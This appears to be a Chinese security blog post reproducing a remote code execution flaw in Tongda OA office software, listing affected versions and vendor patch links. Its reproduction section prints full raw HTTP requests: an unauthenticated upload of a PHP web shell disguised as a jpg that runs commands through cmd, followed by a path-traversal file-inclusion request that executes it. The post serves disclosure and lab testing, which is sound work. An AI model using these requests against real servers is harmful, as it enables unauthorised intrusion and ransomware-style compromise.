目录
漏洞描述
漏洞等级
漏洞影响版本
修复建议
漏洞复现
▶漏洞描述
通达OA是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。
3月13日,通达OA在官方论坛发布通告称,近日接到用户反馈遭到勒索病毒攻击,提示用户注意安全风险,并且于同一天对所有版本发布了加固补丁。
在受影响的版本中,攻击者可以在未认证的情况下向服务器上传jpg图片文件,然后包含该文件,造成远程代码执行。该漏洞无需登录即可触发。
▶漏洞等级
高危
▶漏洞影响版本
-
V11版
-
2017版
-
2016版
-
2015版
-
2013增强版
-
2013版
▶修复建议
| 版本 | 更新包下载地址 |
|---|---|
| V11版 | http://cdndown.tongda2000.com/oa/security/2020_A1.11.3.exe |
| 2017版 | http://cdndown.tongda2000.com/oa/security/2020_A1.10.19.exe |
| 2016版 | http://cdndown.tongda2000.com/oa/security/2020_A1.9.13.exe |
| 2015版 | http://cdndown.tongda2000.com/oa/security/2020_A1.8.15.exe |
| 2013增强版 | http://cdndown.tongda2000.com/oa/security/2020_A1.7.25.exe |
| 2013版 | http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe |
▶漏洞复现
首先下载安装包安装环境,安装包地址,关注微信公众号:xie_sec ,回复:通达OA 即可获得下载链接。
安装好漏洞环境后,访问目标网站。默认账号:admin 密码为空
◣脚本复现
首先用脚本复现,直接命令执行即可。
python3 tongda_rce.py 目标URL
◣手工复现
手工抓包验证,该漏洞存在于以下两个链接中,并且以下链接无需认证即可访问。
-
任意文件上传漏洞 /ispirit/im/upload.php
-
本地文件包含漏洞 /ispirit/interface/gateway.php
POST /ispirit/im/upload.php HTTP/1.1Host: 192.168.10.130Content-Length: 656Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: close------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php$command=$_POST['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh1YB4pV8McGB--
上传成功后,我们看到服务器端返回的数据。接下来下一步我们需要包含的文件名就是 2003/89512385.jpg
然后访问 /ispirit/interface/gateway.php 链接,POST数据包如下
POST /ispirit/interface/gateway.php HTTP/1.1Host: 192.168.10.130User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Connection: closeAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3X-Forwarded-For: 127.0.0.1Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 75json={"url":"../../../general/../attach/im/2003/89512385.jpg"}&cmd=ipconfig
责编:vivian
来源:谢公子博客
本文始发于微信公众号(谢公子学安全):漏洞复现 | 通达OA命令执行漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论